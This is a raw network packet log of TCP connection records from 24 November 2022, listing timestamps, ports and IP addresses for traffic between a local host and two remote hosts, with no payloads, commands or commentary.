Nov 24, 2022 12:19:54.382991076 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.383025885 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.383048058 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.383131981 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.383136034 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.383234978 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.383256912 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.383342981 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.383394003 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.383532047 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.383584023 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.383666992 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.383688927 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.383802891 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.383824110 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.383845091 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.383863926 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.383946896 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.412661076 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.412694931 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.412714958 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.412734985 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.412792921 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.413075924 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.413163900 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.413218021 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.413304090 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.413379908 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.413415909 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.413456917 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.413539886 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.413630962 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.413702965 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.413724899 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.413779020 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.413902044 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.413923025 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.414060116 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.414098978 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.414136887 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.414267063 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.414288998 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.423691988 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.423785925 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.453247070 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.453274012 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.453286886 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.453299999 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.453392982 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.453495026 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.453509092 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.453716040 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.453785896 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.453866005 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.453877926 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.453955889 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.454032898 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.454159021 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.454245090 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.454375029 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.454612970 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.483383894 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.483411074 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.483427048 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.483522892 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.483572006 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.483638048 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.483695030 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.483709097 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.483799934 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.483926058 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.483957052 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.484129906 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.484148026 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.484236002 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.484288931 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.484317064 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.484374046 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.484388113 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.484486103 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.484499931 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.484891891 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.484909058 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.484921932 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.508069038 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.545039892 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:54.593164921 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:54.679035902 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:55.292798042 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:55.341521025 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:55.382199049 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:55.484097958 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:55.533530951 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:55.535752058 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:55.583832026 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:55.605758905 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:55.654247046 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:55.824642897 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:55.854531050 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:55.872989893 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:55.973902941 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:56.003643036 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:56.021812916 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:56.071232080 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:56.109860897 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:56.160051107 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:56.346340895 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:56.394526005 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:56.418754101 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:56.467439890 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:56.486423016 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:56.535584927 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:56.585896969 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:58.314632893 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:58.344295025 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:58.362967014 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:58.483103991 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:58.512787104 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:58.532221079 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:58.620912075 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:58.668948889 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:58.674259901 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:58.723684072 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:58.725876093 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:58.774353981 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:58.775022030 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:58.823036909 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:58.824352980 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:58.875428915 CET	27924	49707	37.220.87.2	192.168.2.3
Nov 24, 2022 12:19:59.070027113 CET	49707	27924	192.168.2.3	37.220.87.2
Nov 24, 2022 12:19:59.462387085 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.479551077 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.479711056 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.480403900 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.497260094 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.576654911 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.576685905 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.576704979 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.576723099 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.576740980 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.576760054 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.576778889 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.576792955 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.576798916 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.576819897 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.576839924 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.576843977 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.576858997 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.576867104 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.576877117 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.576890945 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.576945066 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.577313900 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.577333927 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.577354908 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.577373028 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.577397108 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.577430964 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.578094959 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.578116894 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.578134060 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.578154087 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.578202963 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.578233004 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.578896999 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.578917980 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.578938961 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.578958988 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.578999043 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.579030037 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.579680920 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.579701900 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.579720974 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.579741001 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.579792023 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.579828024 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.580575943 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.580596924 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.580668926 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.593854904 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.593916893 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.593961954 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.594003916 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.594048023 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.594065905 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.594091892 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.594104052 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.594135046 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.594176054 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.594188929 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.594435930 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.594953060 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.595009089 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.595051050 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.595092058 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.595515966 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.595566988 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.595613956 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.595643997 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.595654011 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.595665932 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.596308947 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.596359968 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.596401930 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.596445084 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.596447945 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.596483946 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.597100019 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.597151995 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.597192049 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.597207069 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.597233057 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.597234964 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.597961903 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.598011017 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.598052025 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.598058939 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.598092079 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.598102093 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.598673105 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.598725080 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.598756075 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.598772049 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.598786116 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.598798990 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.599502087 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.599545956 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.599579096 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.599607944 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.599618912 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.599642992 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.600322962 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.600466967 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.600501060 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.600528002 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.600529909 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.600553036 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.600553989 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.601249933 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.601281881 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.601314068 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.601322889 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.601341009 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.601346016 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.601538897 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.602061987 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.602101088 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.602128983 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.602157116 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.602168083 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.602206945 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.602921009 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.602961063 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.602992058 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.603064060 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.611119986 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.611151934 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.611171961 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.611191034 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.611210108 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.611228943 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.611248970 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.611264944 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.611305952 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.612402916 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.612422943 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.612443924 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.612457991 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.612490892 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.612526894 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.613197088 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.613218069 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.613236904 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.613254070 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.613272905 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.613284111 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.613318920 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.614003897 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.614025116 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.614044905 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.614064932 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.614067078 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.614085913 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.614085913 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.614132881 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.614870071 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.614902020 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.614922047 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.614939928 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.614963055 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.614964962 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.615009069 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.616413116 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.616432905 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.616452932 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.616471052 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.616488934 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.616504908 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.616540909 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.617307901 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.617338896 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.617364883 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.617389917 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.617409945 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.617424011 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.617459059 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.618045092 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.618067980 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.618086100 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.618103981 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.618122101 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.618134975 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.618166924 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.618932009 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.618958950 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.618982077 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.619005919 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.619029045 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.619061947 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.619092941 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.620053053 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.620079041 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.620104074 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.620136976 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.620153904 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.620162010 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.620177031 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.620186090 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.620258093 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.628684044 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.628732920 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.628792048 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.631093025 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.631129026 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.631156921 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.631186962 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.631215096 CET	80	49708	66.235.200.147	192.168.2.3
